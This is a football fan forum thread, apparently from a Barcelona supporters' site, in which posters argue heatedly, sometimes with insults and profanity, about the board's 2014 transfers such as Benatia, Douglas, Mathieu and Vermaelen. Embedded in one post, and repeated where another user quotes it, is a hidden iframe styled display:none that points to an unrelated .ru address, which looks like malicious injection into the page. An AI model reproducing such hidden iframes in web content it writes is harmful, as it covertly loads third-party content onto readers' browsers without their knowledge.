Mehdi Benatia

Icarium

Lifestealer
Yeah, they handled the Kroos situation so adroitly :rolleyes:

Keeping him was impossible. He demanded high salary which bayern could not pay and they wanted to cash on him with only one year left on contract. Kroos just does not want to stay there with Real Madrid showing interest in him. Anyway i am talking about their buys.

Bertus

When you think PSG paid 50M without bonus for DL
shakeshead.gif

Bertus

Come on guys. Man City also didn't sign him. There must be reasons like he's only willing to go to the mighty Bayern or something.
If City wants to compete with PSG for the worst deal of the summer, that's not Mehdi's problem.

Mangala did cost more than DL, and IMO he's nowhere near Benatia's level.

F

Flavia

I don't think we will follow Milan, we have a world class youth system compared to Milan and United but try to enjoy the current players, they will not be there for long time and instead of whining(which I see a lot over here) we should just enjoy the ride.

I can't just watch a likely money laundry operation from my team and be quiet. Sorry. There are no footballing reasons to sign douglas. This deal is pretty shady, especially when you see who is involved.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

I

instinct

So are you happy with the mighty Douglas who will lead us to CL? Its not just about Benatia. Pep, the transfer ban, no CBs for 5 years etc. etc. Please dont be a holier than thou just to seem politically correct. This board is pure shite and you know it

I've never said that I am happy with Douglas nor that the board is not shit but your arguments are just absurd.

1.) Douglas won't lead us to CL, the whole team will and if he doesn't perform well, he'll be benched by Alves and Montoya. Reminder: We won the CL with Oleguer

2.) Barca is not destroyed because we didn't sign a certain CB. Several administrative mistakes causes the bad reputation we currently have. We've signed Mathieu and Vermaelen and the former looked very impressive in his first official match here but it seems that Barca fans don't give a shit about Barca players, no matter how they perform. It sucks to read such shit, really. I know that the board is shit but there are so many positive improvements in our team but several people are NEVER happy. We are at the beginning of a new season and all signs point towards success but instead culés laugh at our signings and whine about Benatia. Fuck this. Be happy with what we got and move on. Your statements sound like you won't even give this team a chance to prove that Zubi and Lucho did right. This board is full of shit but I'm happy with what we got and I think that we'll play top football again, even with Mathieu and Vermaelen. Stop being such a whiny kid and move on, seriously.

Sid90

They are shit but it's not end of the world just because they didn't get FREAKING MEHDI BENATIA!

My head is starting to explode when I hear B-E-N-A-T-I-A. How can people whine so much about a signle Barca board decision, don't you have a life?!

Whining is our favourite sport#BOARD OUT #LITTLE DICTATOR MESSI OUT #BRAZILIAN BOY TOY NEYMAR OUT #NOU CAMP CAT OUT.

Bertus

They are shit but it's not end of the world just because they didn't get FREAKING MEHDI BENATIA!

My head is starting to explode when I hear B-E-N-A-T-I-A. How can people whine so much about a signle Barca board decision, don't you have a life?!
People don't only complain about that. Check the Bartomeu's thread for example.

No need to be that defensive, even Flavia wants that board out, yet you don't harrass her.

SeloBarca

Maybe becouse our central defence was the MAIN position we needed to make stronger. We coulda gotten a great player like Benatia but instead we got 2 avarage players in the end of their careers.

Andrew M

Come on. People are talking about the big picture here.

They get Lewa for free, and one the best CBs from last season for 27+4M.

Sorry if it hurts but those are super good deals.

Benatia still has it all to prove.

Bayern are very provident in the transfer market, but the drama queens here are pathetic.

Sid90

I can't just watch a likely money laundry operation from my team and be quiet. Sorry. There are no footballing reasons to sign douglas. This deal is pretty shady, especially when you see who is involved.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Laporte used to do it with Sandro following suit, it only fair that Zubi and co does that to follow tradition :satorra:.

Bertus

Benatia still has it all to prove.

Bayern are very provident in the transfer market, but the drama queens here are pathetic.

Ya sure, as if the board did good.

It's not because they buy Neymar and Suarez that it will erase all the bad things they did.

People want them out and not only because they miss good deals in case you're not aware about it.

Andrew M

Keeping him was impossible. He demanded high salary which bayern could not pay and they wanted to cash on him with only one year left on contract. Kroos just does not want to stay there with Real Madrid showing interest in him. Anyway i am talking about their buys.

Making your best midfielder feel unloved is poor management.

JamDav1982

People don't only complain about that. Check the Bartomeu's thread for example.

No need to be that defensive, even Flavia wants that board out, yet you don't harrass her.

Strangely you do nothing but praise the PSG board.... who paid 60m for Luiz.

Not only is that worse than Benatia, but worse than Barcelonas CB purchases.

Home of Barca Fans